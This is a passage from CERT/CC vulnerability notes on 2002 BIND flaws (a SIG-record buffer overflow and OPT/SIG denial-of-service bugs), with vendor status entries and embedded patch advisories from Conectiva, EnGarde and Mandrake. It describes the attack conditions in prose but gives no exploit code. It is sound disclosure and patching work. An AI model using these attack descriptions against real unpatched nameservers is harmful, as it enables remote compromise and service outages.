[email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sophos Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### SuSE Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Symantec Corporation Unknown\n\nNotified: November 12, 2002 Updated: April 01, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### The SCO Group (SCO Linux) Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Threshold Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Trend Micro Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Unisys Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Wirex Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### XTRADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Xi Graphics Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### YARD RADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### iPlanet Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\nView all 101 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469>\n * <http://www.isc.org/products/BIND/bind-security.html>\n * <http://www.ciac.org/ciac/bulletins/n-013.shtml>\n\n### Acknowledgements\n\nInternet Security Systems is credited for discovering this vulnerability.\n\nThis document was written by Ian A Finlay.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-1220](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-1220>) \n---|--- \n**CERT Advisory:** | [CA-2002-31 ](<http://www.cert.org/advisories/CA-2002-31.html>) \n**Severity Metric:** | 33.05 \n**Date Public:** | 2002-11-12 \n**Date First Published:** | 2002-11-13 \n**Date Last Updated: ** | 2003-05-30 17:06 UTC \n**Document Revision: ** | 27 \n", "modified": "2003-05-30T17:06:00", "published": "2002-11-13T00:00:00", "id": "VU:229595", "href": "https://www.kb.cert.org/vuls/id/229595", "type": "cert", "title": "Overly large OPT record assertion", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-18T20:44:28", "bulletinFamily": "info", "cvelist": ["CVE-2002-1219", "CVE-2002-1220", "CVE-2002-1221"], "description": "### Overview \n\nA vulnerability in BIND allows remote attackers to execute code with the privileges of the process running _named_. This vulnerability is resolved in BIND versions 4.9.11, 8.2.7, 8.3.4, and BIND 9.\n\n### Description \n\nA remotely exploitable buffer overflow exists in _named_. An attacker using malformed SIG records can exploit this vulnerability against a nameserver with recursion enabled. The overflow occurs when the nameserver constructs responses to recursive requests using the malformed SIG records, leading to arbitrary code execution as the _named_ uid, typically root. As was the case with a previous issue affecting _named_ and NXT records ([CA-1999-14](<http://www.cert.org/advisories/CA-1999-14.html>), [VU#16532](<http://www.kb.cert.org/vuls/id/16532>)), a malicious server must reply to a forwarded request from a recursive nameserver in order to exploit the vulnerability. However, as with the NXT record exploit, a full-service nameserver is not required, only a service replying to a legitimate victim nameserver request. \n\n\nThe following versions of BIND are affected: \n \n\\- BIND versions 4.9.5 to 4.9.10 \n\\- BIND versions 8.1, 8.2 to 8.2.6, and 8.3.0 to 8.3.3 \n \n--- \n \n### Impact \n\nA remote attacker could execute arbitrary code on the nameserver with the privileges of the _named_ uid, typically root. \n \n--- \n \n### Solution \n\n[Upgrade](<http://www.isc.org/products/BIND>) to BIND 4.9.11, BIND 8.2.7, BIND 8.3.4, or BIND 9. \n \n--- \n \nOne interim workaround is to disable recursion on vulnerable servers. \n \n--- \n \n### Vendor Information\n\n852283\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer Inc. __ Affected\n\nNotified: November 12, 2002 Updated: December 03, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAffected Systems: Mac OS X and Mac OS X Server with BIND versions 8.1, 8.2 to 8.2.6, and 8.3.0 to 8.3.3\n\nMitigating Factors: BIND is not enabled by default on Mac OS X or Mac OS X Server \n \nThis is addressed in Security Update 2002-11-21 \n\n\n<http://www.apple.com/support/security/security_updates.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Conectiva __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- -------------------------------------------------------------------------- \nCONECTIVA LINUX SECURITY ANNOUNCEMENT \n- -------------------------------------------------------------------------- \n` \n`PACKAGE : bind \nSUMMARY : Remote vulnerabilities in the BIND DNS server \nDATE : 2002-11-14 15:36:00 \nID : CLA-2002:546 \nRELEVANT \nRELEASES : 6.0 \n` \n`- ------------------------------------------------------------------------- \n` \n`DESCRIPTION \n\"bind\" is probably the most used DNS server on the internet. \n` \n` ISS reported[7] buffer overflow and denial of service vulnerabilities \nin some versions of the BIND software. The most dangerous one, the \nbuffer overflow, could be used by remote attacker to execute \narbitrary code on the server with the privileges of the user running \nthe \"named\" process. \n` \n` The vulnerabilities explained below affect BIND as shipped with \nConectiva Linux 6.0. Conectiva Linux 7.0 and 8 already ship BIND 9.x, \nwhich is not vulnerable to the problems reported by ISS. \n` \n` 1) Buffer overflow (CAN-2002-1219) [5] \nAn attacker who can make a vulnerable BIND server make recursive \nqueries to a domain that he (the attacker) controls can exploit this \nvulnerability and execute arbitrary code on the server with the same \nprivileges as the \"named\" process. The BIND packages in Conectiva \nLinux run the \"named\" process with an unprivileged user, and not \nroot, which mitigates the impact of this vulnerability somewhat, \nrequiring that the attacker take further steps to obtain root access. \nAdditionally, there is the bind-chroot package which, if used, runs \nthe server in a chroot area under /var/named which imposes an \nadditional restriction on the actions a potential intruder can take. \n` \n` 2) Denial of service (CAN-2002-1221) [6] \nThe BIND server can be triggered into attempting a NULL pointer \ndereference which will terminate the service. This can be caused by a \nremote attacker who controls a DNS server authoritative for some \ndomain queried by the vulnerable BIND server. \n` \n \n` The packages available through this advisory were built with patches \nthat were made publicly available[3] by ISC less than 24 hours ago. \nConectiva Linux and the majority of other GNU/Linux distributions \nwere notified about this vulnerability (but with not enough details \nto produce a patch) about 12 hours before ISS made it public[7]. We \nare worried about the way in which this whole incident has been \nhandled, specially when considering that DNS is part of the internet \ninfrastructure and thus a vital service. \n` \n` We, and many vendors, do believe in what is commonly called \n\"responsible full disclosure\"[8], where all details about a \nvulnerability are made public after all vendors were notified in \nadvance and have had a reasonable amount of time to prepare and test \nupdated packages. We believe this to be the most secure and \nresponsible method for disclosing vulnerabilities. \n` \n \n`SOLUTION \nAll BIND users should upgrade immediately. After the upgrade, the \nnamed service will be automatically restarted if needed. \n` \n` If it is not possible to upgrade the packages immediately, users \nshould disable recursive queries or restrict them. Disabling \nrecursive queries can be done by the \"recursion no;\" parameter in the \noptions section of the named.conf configuration file. Restricting \naccess to such queries can be accomplished via the \"allow-recursion\" \ndirective in the same configuration file. \n` \n \n` REFERENCES \n1.http://www.isc.org/ \n2.http://www.cert.org/advisories/CA-2002-31.html \n3.http://www.isc.org/products/BIND/patches/bind826.diff \n4.http://www.isc.org/products/BIND/bind-security.html \n5.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1219 \n6.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1221 \n7.https://gtoc.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469 \n8.http://distro.conectiva.com.br/seguranca/problemas/?idioma=en \n` \n \n`DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES \n``<ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-8.2.6-1U60_2cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/bind-chroot-8.2.6-1U60_2cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-8.2.6-1U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-chroot-8.2.6-1U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-8.2.6-1U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-static-8.2.6-1U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-doc-8.2.6-1U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-utils-8.2.6-1U60_2cl.i386.rpm>`` \n` \n \n`ADDITIONAL INSTRUCTIONS \nUsers of Conectiva Linux version 6.0 or higher may use apt to perform \nupgrades of RPM packages: \n- add the following line to /etc/apt/sources.list if it is not there yet \n(you may also use linuxconf to do this): \n` \n` rpm [cncbr] ``<ftp://atualizacoes.conectiva.com.br>`` 6.0/conectiva updates \n` \n`(replace 6.0 with the correct version number if you are not running CL6.0) \n` \n` - run: apt-get update \n- after that, execute: apt-get upgrade \n` \n` Detailed instructions reagarding the use of apt and upgrade examples \ncan be found at ``<http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en>`` \n` \n \n`- ------------------------------------------------------------------------- \nAll packages are signed with Conectiva's GPG key. The key and instructions \non how to import it can be found at \n``<http://distro.conectiva.com.br/seguranca/chave/?idioma=en>`` \nInstructions on how to check the signatures of the RPM packages can be \nfound at ``<http://distro.conectiva.com.br/seguranca/politica/?idioma=en>`` \n- ------------------------------------------------------------------------- \nAll our advisories and generic update instructions can be viewed at \n``<http://distro.conectiva.com.br/atualizacoes/?idioma=en>`` \n` \n`- ------------------------------------------------------------------------- \nsubscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br \nunsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iD8DBQE9099O42jd0JmAcZARAiZGAKDMz0e8eiF+0Zws8sQkvkE5NcHKywCg24tc \nixMwRpolJ8skSz3KyrLfVjM= \n=Smdc \n-----END PGP SIGNATURE----- \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Debian __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.debian.org/security/2002/dsa-196>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Engarde __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`+------------------------------------------------------------------------+ \n| EnGarde Secure Linux Security Advisory November 14, 2002 | \n| ``<http://www.engardelinux.org/>`` ESA-20021114-029 | \n| | \n| Packages: bind-chroot, bind-chroot-utils | \n| Summary: buffer overflow, DoS attacks. | \n+------------------------------------------------------------------------+ \n` \n` EnGarde Secure Linux is a secure distribution of Linux that features \nimproved access control, host and network intrusion detection, Web \nbased secure remote management, e-commerce, and integrated open source \nsecurity tools. \n` \n`OVERVIEW \n- -------- \nSeveral vulnerabilities were found in the BIND nameserver. The \nvulnerabilities, discovered by ISS, range from buffer overflows to \ndenial of service (DoS) attacks. \n` \n` The summaries below are from the ISS advisory which may be found at: \n` \n` ``<http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469>`` \n` \n` * CAN-2002-1219 -- BIND SIG Cached RR Overflow Vulnerability \n` \n` \"A buffer overflow exists in BIND 4 and 8 that may lead to remote \ncompromise of vulnerable DNS servers. An attacker who controls any \nauthoritative DNS server may cause BIND to cache DNS information \nwithin its internal database, if recursion is enabled. Recursion is \nenabled by default unless explicitly disabled via command line \noptions or in the BIND configuration file. Attackers must either \ncreate their own name server that is authoritative for any domain, \nor compromise any other authoritative server with the same criteria. \nCached information is retrieved when requested by a DNS client. There \nis a flaw in the formation of DNS responses containing SIG resource \nrecords (RR) that can lead to buffer overflow and execution of \narbitrary code.\" \n` \n` * CAN-2002-1220 -- BIND OPT DoS \n` \n` \"Recursive BIND 8 servers can be caused to abruptly terminate due to \nan assertion failure. A client requesting a DNS lookup on a \nnonexistent sub- domain of a valid domain name may cause BIND 8 to \nterminate by attaching an OPT resource record with a large UDP \npayload size. This DoS may also be triggered for queries on domains \nwhose authoritative DNS servers are unreachable.\" \n` \n` * CAN-2002-1221 -- BIND SIG Expiry Time DoS \n` \n` \"Recursive BIND 8 servers can be caused to abruptly terminate due to a \nnull pointer dereference. An attacker who controls any authoritative \nname server may cause vulnerable BIND 8 servers to attempt to cache \nSIG RR elements with invalid expiry times. These are removed from the \nBIND internal database, but later improperly referenced, leading to a \nDoS condition.\" \n` \n` All users should upgrade as soon as possible. \n` \n`SOLUTION \n- -------- \nUsers of the EnGarde Professional edition can use the Guardian Digital \nSecure Network to update their systems automatically. \n` \n` EnGarde Community users should upgrade to the most recent version \nas outlined in this advisory. Updates may be obtained from: \n` \n` ``<ftp://ftp.engardelinux.org/pub/engarde/stable/updates/>`` \n``<http://ftp.engardelinux.org/pub/engarde/stable/updates/>`` \n` \n` Before upgrading the package, the machine must either: \n` \n` a) be booted into a \"standard\" kernel; or \nb) have LIDS disabled. \n` \n` To disable LIDS, execute the command: \n` \n` # /sbin/lidsadm -S -- -LIDS_GLOBAL \n` \n` To install the updated package, execute the command: \n` \n` # rpm -Uvh files \n` \n` You must now update the LIDS configuration by executing the command: \n` \n` # /usr/sbin/config_lids.pl \n` \n` To re-enable LIDS (if it was disabled), execute the command: \n` \n` # /sbin/lidsadm -S -- +LIDS_GLOBAL \n` \n` To verify the signatures of the updated packages, execute the command: \n` \n` # rpm -Kv files \n` \n`UPDATED PACKAGES \n- ---------------- \nThese updated packages are for EnGarde Secure Linux Community \nEdition. \n` \n` Source Packages: \n` \n` SRPMS/bind-chroot-8.2.6-1.0.29.src.rpm \nMD5 Sum: 3c845d09bcbe9b07e5395d75a8686689 \n` \n` Binary Packages: \n` \n` i386/bind-chroot-8.2.6-1.0.29.i386.rpm \nMD5 Sum: 0c1daf47be94ae0fd5a29e4007bf68c2 \n` \n` i386/bind-chroot-utils-8.2.6-1.0.29.i386.rpm \nMD5 Sum: 58e0e54d895b8dc3c6f6b5e9228912fb \n` \n` i686/bind-chroot-8.2.6-1.0.29.i686.rpm \nMD5 Sum: 84cb58f02d228859a2fbda3ed1b46dd5 \n` \n` i686/bind-chroot-utils-8.2.6-1.0.29.i686.rpm \nMD5 Sum: 20fb3e4a34cecb431511308afe027941 \n` \n`REFERENCES \n- ---------- \nGuardian Digital's public key: \n``<http://ftp.engardelinux.org/pub/engarde/ENGARDE-GPG-KEY>`` \n` \n` BIND's Official Web Site: \n``<http://www.isc.org/products/BIND/>`` \n` \n` Security Contact: security@guardiandigital.com \nEnGarde Advisories: ``<http://www.engardelinux.org/advisories.html>`` \n` \n`- -------------------------------------------------------------------------- \n$Id: ESA-20021114-029-bind-chroot,v 1.4 2002/11/14 10:02:51 rwm Exp $ \n- -------------------------------------------------------------------------- \nAuthor: Ryan W. Maple <ryan@guardiandigital.com> \nCopyright 2002, Guardian Digital, Inc. \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iD8DBQE903h0HD5cqd57fu0RAgQ2AJ4h+6JBMcFRlC3vKwfRi7dnMRE69ACbBQoO \njReNCYKqxnuwuvOLsRqhznY= \n=9v8+ \n-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### FreeBSD __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:43.bind.asc>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### IBM __ Affected\n\nNotified: November 12, 2002 Updated: November 18, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe AIX operating system is vulnerable to the named and DNS resolver issues in releases 4.3.3, 5.1.0 and 5.2.0. Temporary patches will be available through an efix package by 11/22/2002 or before. The efix will be available at the following URL:\n\n \n \n<ftp://ftp.software.ibm.com/aix/efixes/security/bind_multiple_efix.tar.Z> \nIn the interim, customers may want to implement the workarounds given in the Solutions section to limit their exposure. \n \nThe following APARs will be available in the near future: \n\n\nAIX 4.3.3 APAR IY37088 (available approx 11/27/2002 ) \nAIX 5.1.0 APAR IY37019 (available approx 12/18/2002 ) \nAIX 5.2.0 APAR TBA (available approx TBA ) \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### ISC Affected\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### MandrakeSoft __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n` \n`________________________________________________________________________ \n` \n` Mandrake Linux Security Update Advisory \n________________________________________________________________________ \n` \n`Package name: bind \nAdvisory ID: MDKSA-2002:077 \nDate: November 14th, 2002 \n` \n`Affected versions: 7.2, Single Network Firewall 7.2 \n________________________________________________________________________ \n` \n`Problem Description: \n` \n` Several vulnerabilities were discovered in the BIND8 DNS server by ISS \n(Internet Security Services), including a remotely exploitable buffer \noverflow. The first vulnerability is how named handles SIG records; \nthis buffer overflow can be exploited to obtain access to the victim \nhost with the privilege of the user the named process is running as. \nBy default, Mandrake Linux is configured to run the named process as \nthe named user. To successfully exploit this vulnerability, the \nattacker must control an existing DNS domain and must be allowed to \nperform a recursive query. \n` \n` A possible work-around is to restrict recursive requests, however \nMandrakeSoft encourages all users to upgrade to the provided BIND9 \npackages. You can also completely disable recursion by adding \n\"recursion no;\" to the options section of /etc/named.conf. \n` \n` Several Denial of Service problems also exist in BIND8 that allow \nattackers to terminate the named process. At least one of these \nvulnerabilities seems to be exploitable even when the attacker is \nnot permitted to perform recursive queries, so the work-around noted \nabove is not effective against this DoS. \n` \n` Both problems are not reported to effect BIND9. As Linux-Mandrake \n7.2 and Single Network Firewall 7.2 are the only supported distributions \nto still ship BIND8, we have elected to upgrade to both a patched \nversion of BIND8 and BIND9. The BIND8 packages contain the patch \nISC made available late on the 13th, contrary to their original \nadvisory which called for them to be made available next week. Despite \nthis, however, MandrakeSoft encourages everyone who is able to upgrade \nto BIND9 rather than BIND8. \n` \n` The MandrakeSoft security team wishes to apologize to MandrakeSoft \ncustomers for not being able to provide timely fixes for this problem, \nand regrets the inability of the ISC to work with the Internet community \nat large to provide adequate protection to users of BIND. \n________________________________________________________________________ \n` \n`References: \n` \n` ``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1219>`` \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1220>`` \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1221>`` \n``<http://www.kb.cert.org/vuls/id/852283>`` \n``<http://www.kb.cert.org/vuls/id/229595>`` \n``<http://www.isc.org/products/BIND/bind-security.html>`` \n``<http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469>`` \n________________________________________________________________________ \n` \n`Updated Packages: \n` \n` Linux-Mandrake 7.2: \nf3ca1559f7d2fbe17a2ec6dab327bb7e 7.2/RPMS/bind-8.3.3-2.1mdk.i586.rpm \n0ccd937ec59aa9775f79b05f62d4718c 7.2/RPMS/bind-9.2.1-2.3mdk.i586.rpm \n783ab2327c7e7983a07a8043d3355bbb 7.2/RPMS/bind-devel-8.3.3-2.1mdk.i586.rpm \nbbf717f0f71098ab6c2293d9dbd1c1bd 7.2/RPMS/bind-devel-9.2.1-2.3mdk.i586.rpm \n47a2418adcd190b22956407a667fbc9e 7.2/RPMS/bind-utils-8.3.3-2.1mdk.i586.rpm \n56b9c086c299cdfd367ae87f14db711b 7.2/RPMS/bind-utils-9.2.1-2.3mdk.i586.rpm \ndf34fbecce2e6c61695fcee11a525fea 7.2/RPMS/caching-nameserver-8.1-3.2mdk.noarch.rpm \nf9d914230ec37be01ad4d00abcde0280 7.2/SRPMS/bind-8.3.3-2.1mdk.src.rpm \n8660bd628168c52478b0f766d0ab676c 7.2/SRPMS/bind-9.2.1-2.3mdk.src.rpm \n904b9064763803d24afc79e7140146a4 7.2/SRPMS/caching-nameserver-8.1-3.2mdk.src.rpm \n` \n` Single Network Firewall 7.2: \nf3ca1559f7d2fbe17a2ec6dab327bb7e snf7.2/RPMS/bind-8.3.3-2.1mdk.i586.rpm \n0ccd937ec59aa9775f79b05f62d4718c snf7.2/RPMS/bind-9.2.1-2.3mdk.i586.rpm \n47a2418adcd190b22956407a667fbc9e snf7.2/RPMS/bind-utils-8.3.3-2.1mdk.i586.rpm \n56b9c086c299cdfd367ae87f14db711b snf7.2/RPMS/bind-utils-9.2.1-2.3mdk.i586.rpm \ndf34fbecce2e6c61695fcee11a525fea snf7.2/RPMS/caching-nameserver-8.1-3.2mdk.noarch.rpm \nf9d914230ec37be01ad4d00abcde0280 snf7.2/SRPMS/bind-8.3.3-2.1mdk.src.rpm \n8660bd628168c52478b0f766d0ab676c snf7.2/SRPMS/bind-9.2.1-2.3mdk.src.rpm \n904b9064763803d24afc79e7140146a4 snf7.2/SRPMS/caching-nameserver-8.1-3.2mdk.src.rpm \n________________________________________________________________________ \n` \n`Bug IDs fixed (see ``<https://qa.mandrakesoft.com>`` for more information): \n________________________________________________________________________ \n` \n`To upgrade automatically, use MandrakeUpdate. The verification of md5 \nchecksums and GPG signatures is performed automatically for you. \n` \n`If you want to upgrade manually, download the updated package from one \nof our FTP server mirrors and upgrade with \"rpm -Fvh *.rpm\". A list of \nFTP mirrors can be obtained from: \n` \n` ``<http://www.mandrakesecure.net/en/ftp.php>`` \n` \n`Please verify the update prior to upgrading to ensure the integrity of \nthe downloaded package. You can do this with the command: \n` \n` rpm --checksig <filename> \n` \n`All packages are signed by MandrakeSoft for security. You can obtain \nthe GPG public key of the Mandrake Linux Security Team from: \n` \n` ``<https://www.mandrakesecure.net/RPM-GPG-KEYS>`` \n` \n`Please be aware that sometimes it takes the mirrors a few hours to \nupdate. \n` \n`You can view other update advisories for Mandrake Linux at: \n` \n` ``<http://www.mandrakesecure.net/en/advisories/>`` \n` \n`MandrakeSoft has several security-related mailing list services that \nanyone can subscribe to. Information on these lists can be obtained by \nvisiting: \n` \n` ``<http://www.mandrakesecure.net/en/mlist.php>`` \n` \n`If you want to report vulnerabilities, please contact \n` \n` security_linux-mandrake.com \n` \n`Type Bits/KeyID Date User ID \npub 